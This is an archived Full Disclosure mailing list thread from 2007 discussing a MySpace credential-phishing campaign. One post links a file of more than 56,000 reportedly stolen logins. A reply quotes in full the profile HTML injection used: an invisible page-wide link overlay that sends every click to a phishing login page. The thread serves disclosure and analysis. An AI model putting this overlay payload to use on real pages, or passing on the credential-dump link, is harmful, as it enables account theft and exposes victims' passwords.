|
Full Disclosure
mailing list archives
Re: Grab a myspace credential
From: "K F (lists)" <kf_lists () digitalmunition com>
Date: Tue, 16 Jan 2007 15:19:12 -0500
http://www.ninjahype.org/mov/
nameHREFTrack
-KF
wac wrote:
On 1/16/07, *Deepan* <codeshepherd () gmail com
<mailto:codeshepherd () gmail com>> wrote:
On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote:
> "but at some point all this abuse will likely start sending
users off
> to another service. "
>
> thats only --if the know if they are being abused.. most of them
are
> not coherent about any such issues..
>
>
>
> On 1/15/07, Kevin Pawloski <kpawloski () gmail com
<mailto:kpawloski () gmail com>> wrote:
> The level of phishing sites targeting MySpace and bot
related
It is not quiet easy to fool 56000+ users using phishing sites. I
wonder
how Mark is doing it.
Hmm... Oh no is very easy, yes very easy what he is doing. He left
some traces on some of the "cracked" accounts, I was expectig of
somebody to comment earlier since I've been a couple of hours since
the initial post.
When you modify a profile you can add this to the data of the profile,
you know those HTML customizations. I found this on one of the
accounts that really got my attention a little bit more than the girl
of the account :P
HOLA!!!!<a style="text-decoration:none;position:
absolute;top:1px;left:1px;" href="http://marcolano.com/login/";><img
style="border-width:0px;width:2024px; height:1768px;"
src="http://x.myspace.com/images/clear.gif";></a><a
style="text-decoration:none;position: absolute;top:1px;left:1px;"
href="http://marcolano.com/login/";><img
style="border-width:0px;width:2024px; height:1768px;"
src="http://x.myspace.com/images/clear.gif";></a><embed
allowScriptAccess="never" allowNetworking="internal"
enableJSURL="false" enableHREF="false" saveEmbedTags="true"
src="http://www.../mov/cid_3277_f.mov"; width="1" height="1">
As you might see, this creates a huge invisible link in the page in
front of everything, so when you click into anything on the page like
a link or anything it will take you to that phising website so ppl
beleive that the account expired and enter their user+pass. Now I
beleive that his message was a way to tell about a BUG in myspace that
should filter that content and it is not doing it. So... we are in
fact not talking about a stupid phishing website for those who still
beleive that.
Regards
Waldo
> activity that has been targeting MySpace lately is pretty
> alarming. Granted there is no real financial risk if an
> account gets compromised for the user but at some point all
> this abuse will likely start sending users off to another
> service.
>
> Kevin
>
>
> On 1/15/07, North, Quinn <QNorth () iso com
<mailto:QNorth () iso com>> wrote:
> "youmustbecompleteretards () idiot com
:doyouhonestlythinkiwillputmyrealpass
> wordhere"
>
> ...at least there is some hope left in the world :-\
>
> --=Q=--
>
> -----Original Message-----
> From: full-disclosure-bounces () lists grok org uk
<mailto:full-disclosure-bounces () lists grok org uk>
> [mailto:
full-disclosure-bounces () lists grok org uk
<mailto:full-disclosure-bounces () lists grok org uk>] On
> Behalf Of Emma
> Perdue
> Sent: Monday, January 15, 2007 7:48 AM
> To: full-disclosure () lists grok org uk
<mailto:full-disclosure () lists grok org uk>
> Subject: [Full-disclosure] Grab a myspace credential
>
> 56000+ and counting
>
> http://www.marcolano.com/login/myspace.txt
>
> --
> *Emma aka TINK*
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
http://secunia.com/
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
-----------------------------------------------
Regards
Deepan Chakravarthy N
http://www.codeshepherd.com/
http://sudoku-solver.net/
I am a programmer by day,
I dig grave for other programmers by night.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
<http://secunia.com/>
------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
Re: Grab a myspace credential Juha-Matti Laurio (Jan 16)
|
Intro
![http://x.myspace.com/images/clear.gif"](http://x.myspace.com/images/clear.gif"){kind=link}